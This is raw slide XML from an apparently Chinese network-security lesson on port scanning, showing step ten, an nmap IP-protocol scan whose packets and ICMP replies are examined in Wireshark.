                <a:cs typeface="Segoe UI Semilight" panose="020B0402040204020203" pitchFamily="34" charset="0"/>
                <a:sym typeface="+mn-ea"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="10" name="文本框 573"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="7293450" y="3377688"/>
              <a:ext cx="868680" cy="368509"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr algn="l"/>
              <a:r>
                <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="tx1">
                      <a:lumMod val="75000"/>
                      <a:lumOff val="25000"/>
                    </a:schemeClr>
                  </a:solidFill>
                  <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:sym typeface="+mn-ea"/>
                </a:rPr>
                <a:t>步骤十</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="11" name="文本框 574"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6667040" y="3537851"/>
              <a:ext cx="450850" cy="368509"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="FFF9E6"/>
                  </a:solidFill>
                  <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                </a:rPr>
                <a:t>10</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFF9E6"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="18" name="标题 17"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
            <p:custDataLst>
              <p:tags r:id="rId1"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="480060" y="713740"/>
            <a:ext cx="3855085" cy="864235"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="zh-CN" sz="4400">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>【项目实施】</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="4400"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="矩形 2"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId2"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-5715" y="127635"/>
            <a:ext cx="367030" cy="388620"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:gradFill>
            <a:gsLst>
              <a:gs pos="0">
                <a:srgbClr val="012D86"/>
              </a:gs>
              <a:gs pos="100000">
                <a:srgbClr val="0E2557"/>
              </a:gs>
            </a:gsLst>
            <a:lin ang="5400000" scaled="0"/>
          </a:gra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4" name="矩形 3"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId3"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="403860" y="127635"/>
            <a:ext cx="76200" cy="387985"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="0070C0"/>
          </a:soli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5" name="文本占位符 3"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId4"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="522605" y="57150"/>
            <a:ext cx="3431540" cy="558165"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr"/>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0" algn="l" defTabSz="963930" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1055"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buNone/>
              <a:defRPr sz="2955" b="1" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr marL="723265" indent="-241300" algn="l" defTabSz="963930" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="525"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
              <a:defRPr sz="2530" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr marL="1205230" indent="-241300" algn="l" defTabSz="963930" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="525"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
              <a:defRPr sz="2110" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr marL="168783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4pPr>
            <a:lvl5pPr marL="216979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5pPr>
            <a:lvl6pPr marL="26517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6pPr>
            <a:lvl7pPr marL="31343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7pPr>
            <a:lvl8pPr marL="361632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8pPr>
            <a:lvl9pPr marL="409829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9pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:spcBef>
                <a:spcPct val="50000"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="3600" b="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent5"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>2.2.</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="3600" b="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent5"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>2</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="3600" b="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent5"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t> 端口扫描</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="3600" b="0" dirty="0">
              <a:solidFill>
                <a:schemeClr val="accent5"/>
              </a:solidFill>
              <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="118" name="文本框 117"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5257165" y="1112202"/>
            <a:ext cx="5080000" cy="922020"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:pPr indent="304800"/>
            <a:r>
              <a:rPr lang="zh-CN" b="0">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>2.用Wireshark工具查看nmap 发送的数据包，nmap向目标主机发送了头部为空的IP报文，如图2-2-61所示。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" b="0">
              <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="2" name="图片 1"/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="5257165" y="2034223"/>
            <a:ext cx="5276850" cy="3457575"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="119" name="文本框 118"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5257165" y="5491798"/>
            <a:ext cx="5080000" cy="368300"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:pPr indent="0" algn="ctr"/>
            <a:r>
              <a:rPr lang="zh-CN" b="0">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>图2-2-61 nmap发送的数据包</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" b="0">
              <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>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1+#ppt_w/2"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr additive="base">
                                        <p:cTn id="8" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="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组合 6"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="479781" y="2216574"/>
            <a:ext cx="4062095" cy="854075"/>
            <a:chOff x="6627851" y="3377688"/>
            <a:chExt cx="4062095" cy="854560"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="8" name="矩形: 圆角 27"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6627851" y="3493208"/>
              <a:ext cx="457200" cy="457200"/>
            </a:xfrm>
            <a:prstGeom prst="round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F9E6"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="9" name="矩形 8" descr="e7d195523061f1c003d7160bb3852330e69e1b47c664ea0314E9593E18313AD830F940F1AC53C40C0B8B3D93D4DFF44B590F8D4A945ADE53F5D61968231FCAE157B0D7022AA0681C03E9FB4B1E3862D0C13C109685D0C1F9D9ACA5E10B258C1727924FC3FC0E61468152E413AFD3EDAA03A1BA0B768D2D39A9D26D6009DD7E2AED15C90B1EA11F84"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="7293331" y="3709982"/>
              <a:ext cx="3396615" cy="522266"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>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100000"/>
                </a:lnSpc>
              </a:pPr>
              <a:r>
                <a:rPr lang="zh-CN" altLang="en-US" sz="1400" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1">
                      <a:lumMod val="50000"/>
                    </a:schemeClr>
                  </a:solidFill>
                  <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:cs typeface="Segoe UI Semilight" panose="020B0402040204020203" pitchFamily="34" charset="0"/>
                  <a:sym typeface="+mn-ea"/>
                </a:rPr>
                <a:t>使用nmap工具进行IP协议的主机端口扫描并分析</a:t>
              </a:r>
              <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="Segoe UI Semilight" panose="020B0402040204020203" pitchFamily="34" charset="0"/>
                <a:sym typeface="+mn-ea"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="10" name="文本框 573"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="7293450" y="3377688"/>
              <a:ext cx="868680" cy="368509"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr algn="l"/>
              <a:r>
                <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="tx1">
                      <a:lumMod val="75000"/>
                      <a:lumOff val="25000"/>
                    </a:schemeClr>
                  </a:solidFill>
                  <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:sym typeface="+mn-ea"/>
                </a:rPr>
                <a:t>步骤十</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="11" name="文本框 574"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6667040" y="3537851"/>
              <a:ext cx="450850" cy="368509"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="FFF9E6"/>
                  </a:solidFill>
                  <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                </a:rPr>
                <a:t>10</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFF9E6"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="18" name="标题 17"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
            <p:custDataLst>
              <p:tags r:id="rId1"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="480060" y="713740"/>
            <a:ext cx="3855085" cy="864235"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="zh-CN" sz="4400">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>【项目实施】</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="4400"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="矩形 2"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId2"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-5715" y="127635"/>
            <a:ext cx="367030" cy="388620"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:gradFill>
            <a:gsLst>
              <a:gs pos="0">
                <a:srgbClr val="012D86"/>
              </a:gs>
              <a:gs pos="100000">
                <a:srgbClr val="0E2557"/>
              </a:gs>
            </a:gsLst>
            <a:lin ang="5400000" scaled="0"/>
          </a:gra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4" name="矩形 3"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId3"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="403860" y="127635"/>
            <a:ext cx="76200" cy="387985"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="0070C0"/>
          </a:soli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5" name="文本占位符 3"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId4"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="522605" y="57150"/>
            <a:ext cx="3431540" cy="558165"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr"/>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0" algn="l" defTabSz="963930" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1055"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buNone/>
              <a:defRPr sz="2955" b="1" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr marL="723265" indent="-241300" algn="l" defTabSz="963930" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="525"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
              <a:defRPr sz="2530" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr marL="1205230" indent="-241300" algn="l" defTabSz="963930" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="525"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
              <a:defRPr sz="2110" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr marL="168783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4pPr>
            <a:lvl5pPr marL="216979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5pPr>
            <a:lvl6pPr marL="26517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6pPr>
            <a:lvl7pPr marL="31343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7pPr>
            <a:lvl8pPr marL="361632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8pPr>
            <a:lvl9pPr marL="409829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9pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:spcBef>
                <a:spcPct val="50000"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="3600" b="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent5"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>2.2.</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="3600" b="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent5"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>2</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="3600" b="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent5"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t> 端口扫描</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="3600" b="0" dirty="0">
              <a:solidFill>
                <a:schemeClr val="accent5"/>
              </a:solidFill>
              <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="119" name="文本框 118"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5645785" y="1141730"/>
            <a:ext cx="5080000" cy="645160"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:pPr indent="304800"/>
            <a:r>
              <a:rPr lang="zh-CN" b="0">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>3.查看目标主机返回的数据包，返回了ICMP响应包，协议标号是1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="0">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>5</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" b="0">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>，如图2-2-62所示。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" b="0">
              <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="2" name="图片 1"/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="5645785" y="1786890"/>
            <a:ext cx="5267325" cy="3600450"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="120" name="文本框 119"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5645785" y="5387340"/>
            <a:ext cx="5080000" cy="368300"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:pPr indent="0" algn="ctr"/>
            <a:r>
              <a:rPr lang="zh-CN" b="0">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>图2-2-62 返回ICMP响应包</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" b="0">
              <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>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1+#ppt_w/2"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr additive="base">
